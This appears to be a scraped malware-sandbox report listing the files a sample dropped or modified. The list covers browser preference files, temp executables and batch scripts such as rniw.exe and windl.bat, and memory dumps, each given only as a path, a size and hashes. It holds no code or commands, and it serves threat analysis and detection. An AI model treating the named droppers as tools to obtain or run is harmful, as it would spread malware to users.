C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
959db92e089317273b7880066f747608

SHA1
ec79eeaf29a390dcbfa978b0a3deb3dae68a9809

SHA256
9e63f9855896649505118c9454da0ca66ada628a6dbe36e202f9e9663ac3a4d8

SHA512
c2bbbb95534a146cc17164823f04c92bc2fde3f7ce2da261ec70de61155e4ae5c13eb6339a3af48d9a176713c251c8699b71c0cda62faa51c7ea234f2343eb41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0fe40585757b7d3486b97067e85822e4

SHA1
6080965867dfae012d3cf560155faee3c1b63a64

SHA256
f4c9fc448ab72dff066280536b58f8a3b78a70d3a6be98b8027908f12f20fc08

SHA512
dda97de1794e3b27ed7af80b697f9a2c48f3b1e87e0ededaee4a26a5ac1a6c64fbe0fb4de550aff93356ac48bc36fe03b013361db68f8895e3770d112686710b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8c79ee8697663aa44b506bab0af01ed5

SHA1
345862d81514da82f55f0644b24f7823bed03aea

SHA256
35d0f2433343a64dc0cbf247b880c5c9f10ba1d5a0ec57fb69e1fa2e70caa1f0

SHA512
20a1d92d33b763aee274456dc1cd57f833288da3c1520fc6931bee778587b400993cc1929ca7980321daa500f83d6cab62d8ea97c001ea8a402936e9eae937fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
b5a78450dcc2eb28d843f3ef8f5a8523

SHA1
7d2525099cd3c8e1b7e19fa9c53f1a1286876db6

SHA256
81e1fd6b0399f4ada395712e4f636986c7bde3bb04131ac3369f946f9b5a3707

SHA512
815d9f84c733679d1864d1e6e3673bf92e2568d98032b4f5bc89bef0dc4a7a815deda9e63c1cccc1ea77d223f63caac1163b7928e311c82c826a3d6363e2c007

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5c141c9b4d54c1e02bbe8af6ca80232c

SHA1
5495244b7c83dfe35d8a53493c6f9085cc78b6e2

SHA256
bd28534fae49cd4a6b358c839ec7fecd40c0aaed4fa441d6b3bfc5a3ccab249c

SHA512
fe0c656747d7598a09beca1b4281b6f39849e9e8b23f6fbb55cc79aa00d321ec17f422e8b13cb4ffc30e23151b71fac4d69574d41ef70896ec66ff0ae5b83f5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cd6685bc225ac0c082b36b54f13e7543

SHA1
177a241fa1851f130019dd115f2608196dd13f10

SHA256
f39b753d26d75a4fa775b1403a4f1b4c1aec26f887eef9831328ca54efeda932

SHA512
ddde749102e4497ef79e692439c50f19da13fd50c642c1d8b5ddff205895ebda349071189f4a755ea2faea84156ed1260ba22fb9f82e35d302d4249bd51c1101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585acd.TMP

Filesize
1KB

MD5
ce31c3ce149c469d9e985c693d0e315d

SHA1
0fc7cdea405c9bf328ce2b97ef9715ff12fdd9f6

SHA256
77dd1a2c29772ff3f4b55371f093fcd9e6969babebcb979fa28ec62535c59472

SHA512
20439e09ff17a91c069db29b5c8e4d06f6174f23f538b0ec68ef1f3f45fdf5c911bc6d387ce247003aea68ebd1b829604859260948d1cdc6d45395a45b76c547

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
907e73487beb245f986bf8d6d014f54f

SHA1
15247333194d490dc5370d68af95fc352d125861

SHA256
45c11a603e314b46323ea2e051863cc9f1f21be39ecb1fcdceb81647587472c5

SHA512
6e7eb53ee90fbe3a4bc0bb521772d00ae6207cf9add42c18216173c442ecc2e4d44450890233484e0205ecf66f12933e2ccfb26ff9621f4c1d4eaa0a4c12ec3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
566d518a33d18c8f56803ab22161d8d1

SHA1
8d54b0067829fa69988c4651664248e5f8f2c1f4

SHA256
e074d6da4945dd78a8eb2397972d20818c7d4eabe103a294b8c647019a96ae0a

SHA512
c7cb084d0f38f37e987fb9ba46df5fb67750eea7c0495613ccadf54b912e4db5870854b9088121faa200c755a282b47aaf52c0e48ab5f78ed374304865386b08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
896KB

MD5
8a410ca32cfa68b6af87dd2a15895e22

SHA1
78218033b8278df0e23513baaffdfc346efaf5cb

SHA256
078710f879b2d154a2ca8d9983b4ba9a90fc0be52a52c98658ad9c2c5fa5592c

SHA512
de46b955a9e9ca25d045efae4f34367a5b5832d36e49291d0c5e237381af12045a479b0d53777ab135db15b7af09f24152d48210ba24e4ffe0bc815b9936972e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_znwoqoem.ay4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\one.rtf

Filesize
403B

MD5
6fbd6ce25307749d6e0a66ebbc0264e7

SHA1
faee71e2eac4c03b96aabecde91336a6510fff60

SHA256
e152b106733d9263d3cf175f0b6197880d70acb753f8bde8035a3e4865b31690

SHA512
35a0d6d91178ec10619cf4d2fd44d3e57aa0266e1779e15b1eef6e9c359c77c384e0ffe4edb2cde980a6847e53f47733e6eacb72d46762066b3541dee3d29064

Download Submit
C:\Users\Admin\AppData\Local\Temp\rniw.exe

Filesize
76KB

MD5
9232120b6ff11d48a90069b25aa30abc

SHA1
97bb45f4076083fca037eee15d001fd284e53e47

SHA256
70faa0e1498461731f873d3594f20cbf2beaa6f123a06b66f9df59a9cdf862be

SHA512
b06688a9fc0b853d2895f11e812c48d5871f2793183fda5e9638ded22fc5dc1e813f174baedc980a1f0b6a7b0a65cd61f29bb16acc6dd45da62988eb012d6877

Download Submit
C:\Users\Admin\AppData\Local\Temp\text.txt

Filesize
396B

MD5
9037ebf0a18a1c17537832bc73739109

SHA1
1d951dedfa4c172a1aa1aae096cfb576c1fb1d60

SHA256
38c889b5d7bdcb79bbcb55554c520a9ce74b5bfc29c19d1e4cb1419176c99f48

SHA512
4fb5c06089524c6dcd48b6d165cedb488e9efe2d27613289ef8834dbb6c010632d2bd5e3ac75f83b1d8024477ebdf05b9e0809602bbe1780528947c36e4de32f

Download Submit
C:\Users\Admin\AppData\Local\Temp\windl.bat

Filesize
771B

MD5
a9401e260d9856d1134692759d636e92

SHA1
4141d3c60173741e14f36dfe41588bb2716d2867

SHA256
b551fba71dfd526d4916ae277d8686d83fff36d22fcf6f18457924a070b30ef7

SHA512
5cbe38cdab0283b87d9a9875f7ba6fa4e8a7673d933ca05deddddbcf6cf793bd1bf34ac0add798b4ed59ab483e49f433ce4012f571a658bc0add28dd987a57b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
319B

MD5
cf7ba19aeda7302492c2c0ff9c14ed34

SHA1
e63815eb7870bb2c07b76cc5eefd2c0b3f90ab7a

SHA256
6d2f2ba366572540ccdd0370941bc382a8ae1bd33a33063d8ff206ca391eb955

SHA512
2d7c03e1acf6478c380e355a861d4bbc122eec82f6524baa3df11f6cd365804c1ef3088460243eeeef79bce5ca22d302aa74da7e2701c73adc3c35df50dfad41

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
memory/1092-1631-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/1092-701-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/2968-702-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-763-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-709-0x00007FF9D6E20000-0x00007FF9D6E30000-memory.dmp

Filesize
64KB

Download
memory/2968-703-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-708-0x00007FF9D6E20000-0x00007FF9D6E30000-memory.dmp

Filesize
64KB

Download
memory/2968-706-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-704-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-761-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-764-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-705-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/2968-762-0x00007FF9D93F0000-0x00007FF9D9400000-memory.dmp

Filesize
64KB

Download
memory/4588-696-0x000000001B580000-0x000000001B626000-memory.dmp

Filesize
664KB

Download
memory/4588-697-0x000000001BB00000-0x000000001BFCE000-memory.dmp

Filesize
4.8MB

Download
memory/4588-699-0x0000000001060000-0x0000000001068000-memory.dmp

Filesize
32KB

Download
memory/4588-700-0x000000001C350000-0x000000001C39C000-memory.dmp

Filesize
304KB

Download
memory/4588-698-0x000000001C0A0000-0x000000001C13C000-memory.dmp

Filesize
624KB

Download
memory/5192-742-0x000001737AAB0000-0x000001737AAC4000-memory.dmp

Filesize
80KB

Download
memory/5192-768-0x000001737AD30000-0x000001737AE9A000-memory.dmp

Filesize
1.4MB

Download
memory/5192-741-0x000001737AA50000-0x000001737AA77000-memory.dmp

Filesize
156KB

Download
memory/5192-737-0x000001737A7B0000-0x000001737A7D2000-memory.dmp

Filesize
136KB

Download
memory/5884-790-0x0000000008F40000-0x0000000008F4E000-memory.dmp

Filesize
56KB

Download
memory/5884-793-0x0000000008FD0000-0x0000000008FE0000-memory.dmp

Filesize
64KB

Download
memory/5884-799-0x0000000008FD0000-0x0000000008FE0000-memory.dmp

Filesize
64KB

Download
memory/5884-794-0x0000000008FD0000-0x0000000008FE0000-memory.dmp

Filesize
64KB

Download
memory/5884-801-0x000000000BB30000-0x000000000BB40000-memory.dmp

Filesize
64KB

Download
memory/5884-800-0x0000000008FD0000-0x0000000008FE0000-memory.dmp

Filesize
64KB

Download
memory/5884-798-0x000000000BB30000-0x000000000BB40000-memory.dmp

Filesize
64KB

Download
memory/5884-797-0x000000000BB30000-0x000000000BB40000-memory.dmp

Filesize
64KB

Download
memory/5884-795-0x0000000008FD0000-0x0000000008FE0000-memory.dmp

Filesize
64KB

Download
memory/5884-796-0x0000000008FD0000-0x0000000008FE0000-memory.dmp

Filesize
64KB

Download
memory/5884-789-0x0000000008F70000-0x0000000008FA8000-memory.dmp

Filesize
224KB

Download
memory/5884-772-0x0000000005A70000-0x0000000006016000-memory.dmp

Filesize
5.6MB

Download
memory/5884-771-0x0000000000220000-0x00000000008CE000-memory.dmp

Filesize
6.7MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads